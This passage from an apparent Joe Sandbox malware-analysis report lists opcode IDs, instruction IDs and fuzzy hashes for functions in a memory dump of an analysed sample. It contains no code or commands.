                                                                                                                                                              • Opcode Fuzzy Hash: 8f8d1e477b53184a041bf1fd3018d047cc445c33d8ba0a69a9e2477e322c521d
                                                                                                                                                              • Instruction Fuzzy Hash: DEE07D3650E94C0BCF00EF98EC200D977A0FBCD308F0101AEF45CC3151D25195128355
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a63be32cedb37298d9c48de95c8520da67713cc4637ae12971385a0924e512df
                                                                                                                                                              • Instruction ID: cc2c48cf1fd40445a1ef4db1dc942163b6b324ff59c513f557c241ef9f6429a4
                                                                                                                                                              • Opcode Fuzzy Hash: a63be32cedb37298d9c48de95c8520da67713cc4637ae12971385a0924e512df
                                                                                                                                                              • Instruction Fuzzy Hash: 36E0DF34E0850E0BDB00FF98D811AEAB7A1EF89309F00047AE91CC32D6CA256A518391
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0ad7588686922f30586d009a341e0d23612d0f623e452724058f593138f9ff20
                                                                                                                                                              • Instruction ID: 11549f7bf8cb3914d41989418965ef6b00bd71935572124c5fc9974b0cfd2446
                                                                                                                                                              • Opcode Fuzzy Hash: 0ad7588686922f30586d009a341e0d23612d0f623e452724058f593138f9ff20
                                                                                                                                                              • Instruction Fuzzy Hash: 80E07D3260DF4C4FCBA0EA697C105D57BA4FF85308F01006AF85CCB241D2325911C742
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 254c83a0eaaf8685a80a570ca8d0c78d4f63227ab88a22137374b907c894656e
                                                                                                                                                              • Instruction ID: d0e4d653a0a27d4fbcbba90e9817f804a966acd2f8ae775c096f7ee00fb5cef3
                                                                                                                                                              • Opcode Fuzzy Hash: 254c83a0eaaf8685a80a570ca8d0c78d4f63227ab88a22137374b907c894656e
                                                                                                                                                              • Instruction Fuzzy Hash: 56E0926190E9CD5FDF81DBAC68585E97FF0EF16218B4808EAC0A9D7522D5654515C301
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b302db4b1fb2dfc7fad518a4a8d11fa56ca6a36488abeda874a9e4c40aa0654e
                                                                                                                                                              • Instruction ID: 639c4e16797beb493b94f4405e27401cf756bfd319eb01ad279a0680d8ec081e
                                                                                                                                                              • Opcode Fuzzy Hash: b302db4b1fb2dfc7fad518a4a8d11fa56ca6a36488abeda874a9e4c40aa0654e
                                                                                                                                                              • Instruction Fuzzy Hash: DED0A7267099264AE65C464AB5607B873C0EB482A6F80003AE449C94D1CA1CD7C593B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5e01645b5abf8b039552bdd1b62bbedb21dd26d7641f7bd14c44c5650c2eb37a
                                                                                                                                                              • Instruction ID: 8cf131dbcbb418c844687639623bc6d7299508a77d401c688352c19d5db2c75e
                                                                                                                                                              • Opcode Fuzzy Hash: 5e01645b5abf8b039552bdd1b62bbedb21dd26d7641f7bd14c44c5650c2eb37a
                                                                                                                                                              • Instruction Fuzzy Hash: DDD05E22F14C454B9384FABC882522972C3DF8A334B24C374A83EC32E9DD189C421342
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d2e7304e591bd147f4344e83852c425f7ffd3e8651fa2ff7705d4d72cf0e54ab
                                                                                                                                                              • Instruction ID: 86defbc0faf4720472439cddf0733993859de9671e4052711398a8d68144a9ca
                                                                                                                                                              • Opcode Fuzzy Hash: d2e7304e591bd147f4344e83852c425f7ffd3e8651fa2ff7705d4d72cf0e54ab
                                                                                                                                                              • Instruction Fuzzy Hash: A7E0C230E0A10E87EB3857B8A0100B032A1EF4C329F71437AD4280C1E5D77ADD938669
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c06e1d162bf046f1281fc6d5beadc4cbaf31e053afc4a8622aab0b1eb2044326
                                                                                                                                                              • Instruction ID: 1688a731273968cc4a4c9996904ba325f44a5e4dc76b14123fe1c482f65affb7
                                                                                                                                                              • Opcode Fuzzy Hash: c06e1d162bf046f1281fc6d5beadc4cbaf31e053afc4a8622aab0b1eb2044326
                                                                                                                                                              • Instruction Fuzzy Hash: 8BD0C924BA690A47D618F76CD892420F3D0FB4D700B9556A0E409C7396E968F98196C2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0e9a4ec0835565eba2586fcc1a9d53534e7ca850160b49b4a4c5b5c508847d18
                                                                                                                                                              • Instruction ID: 9f533892f2d2c32753fea860674f8ce07601da0a521443bbce1915ab3cacd733
                                                                                                                                                              • Opcode Fuzzy Hash: 0e9a4ec0835565eba2586fcc1a9d53534e7ca850160b49b4a4c5b5c508847d18
                                                                                                                                                              • Instruction Fuzzy Hash: 20D0A72165CB861FD356962815A49E23FE5CB5D290308459EC9E9CB293D02D68968360
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: fd1197f721b5a7f5ea9b3403b9d7a7e2d554fce6a77deb830f783671c1b4a527
                                                                                                                                                              • Instruction ID: 32a6edaac7416b6affbb6854ff1fdaeb3224a327e854a9e7e50984a9f355ee4e
                                                                                                                                                              • Opcode Fuzzy Hash: fd1197f721b5a7f5ea9b3403b9d7a7e2d554fce6a77deb830f783671c1b4a527
                                                                                                                                                              • Instruction Fuzzy Hash: D0D05E40B1D98257EB0F23B83832ABD9A91EF95300F2402FEE059839D7DC0D5903810A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: de71f007dac363d381102428e19c14f357ed448b91a539e5f09970c66a8e2b0a
                                                                                                                                                              • Instruction ID: f6066d5c872eb6b70152f7a50fd3b1505b71fc9699eaa72651a27b0ea9ebfcc3
                                                                                                                                                              • Opcode Fuzzy Hash: de71f007dac363d381102428e19c14f357ed448b91a539e5f09970c66a8e2b0a
                                                                                                                                                              • Instruction Fuzzy Hash: 9BD01231418B0A4BC704EB14E41089A77A0BB88324F400B2DA0AE911E5DF6893818682
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 64c691b3fdf9e62cec2ca8193eecc626140cbe42730f3632562f4abc5091df03
                                                                                                                                                              • Instruction ID: b4364f1377dfb57bd604d94887ebb29a3902e4d6fd0a1fe8b41919e350d47a41
                                                                                                                                                              • Opcode Fuzzy Hash: 64c691b3fdf9e62cec2ca8193eecc626140cbe42730f3632562f4abc5091df03
                                                                                                                                                              • Instruction Fuzzy Hash: 60D05B7150CB4947C344DF04E4508DAB790FF94320F801B6DF067821F5DF7492C18682
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b10ff9b600d8b2f85a1c0ad2e3b103cae50fb2c0c4d25ce8184347d557490baa
                                                                                                                                                              • Instruction ID: 2ee3ea4e9201a2c44a095c552c857e3f38748b60568f2b00f4e2112fb523b428
                                                                                                                                                              • Opcode Fuzzy Hash: b10ff9b600d8b2f85a1c0ad2e3b103cae50fb2c0c4d25ce8184347d557490baa
                                                                                                                                                              • Instruction Fuzzy Hash: 17D0123240CA0647C304DF14E81089AB7A0FB88324F440B7DA0AD911E5DF6893818682
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 10d4b4e164e42dabc7f2e8a109b09e3c5fe48bc2215045196c2e7c52e7504db8
                                                                                                                                                              • Instruction ID: dacf234d5eb4962a6ea69c630a2c28957202bacfdc7555b7400b960a2a801f72
                                                                                                                                                              • Opcode Fuzzy Hash: 10d4b4e164e42dabc7f2e8a109b09e3c5fe48bc2215045196c2e7c52e7504db8
                                                                                                                                                              • Instruction Fuzzy Hash: A5D01232F4980D8F9F90FB98B4526EDF7A0EF49226F440037D11CD3151CD2514914781
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 86f4374eb84d5d2df7daa83d9e4b8041ede90480bdd6dbd74e1ea344353a5537
                                                                                                                                                              • Instruction ID: 9e0239182b528e84e3d2003f601ef5613e87a3091c6fe157d7cf6c684b1f5943
                                                                                                                                                              • Opcode Fuzzy Hash: 86f4374eb84d5d2df7daa83d9e4b8041ede90480bdd6dbd74e1ea344353a5537
                                                                                                                                                              • Instruction Fuzzy Hash: E1D0A780B0DDC15BE70977FC39266FD5AD0EF55300F2401BEE069831D7DC1C95028102
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: R_H
                                                                                                                                                              • API String ID: 0-21197713
                                                                                                                                                              • Opcode ID: f80d484ba0173c5fea1ce38f26984f34acd6fcd50a1922652c042ab5132f998f
                                                                                                                                                              • Instruction ID: d5b2c35edda5516ef5e64800251667b2e6ef81d114314cff15e70c72a3cced7b
                                                                                                                                                              • Opcode Fuzzy Hash: f80d484ba0173c5fea1ce38f26984f34acd6fcd50a1922652c042ab5132f998f
                                                                                                                                                              • Instruction Fuzzy Hash: 78F14630739F1E4BE32DCF5594D15B93392EB98701B664A3CC9EB835A6EE24B5134AC0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2165060903.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b880000_K6aOw2Jmji.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4eaec090d138de3b50218220fcdaa110cbd43b1526583482065d4e60cc61e812
                                                                                                                                                              • Instruction ID: a10de6aa543feefb1359add42b996d7a92169986583a41b1d61fcbeb3d03f080
                                                                                                                                                              • Opcode Fuzzy Hash: 4eaec090d138de3b50218220fcdaa110cbd43b1526583482065d4e60cc61e812
                                                                                                                                                              • Instruction Fuzzy Hash: 81C15C72B0DA890FE76DAB7C58665B97BD1EF95210F0841BFD09AC31E7ED2958078301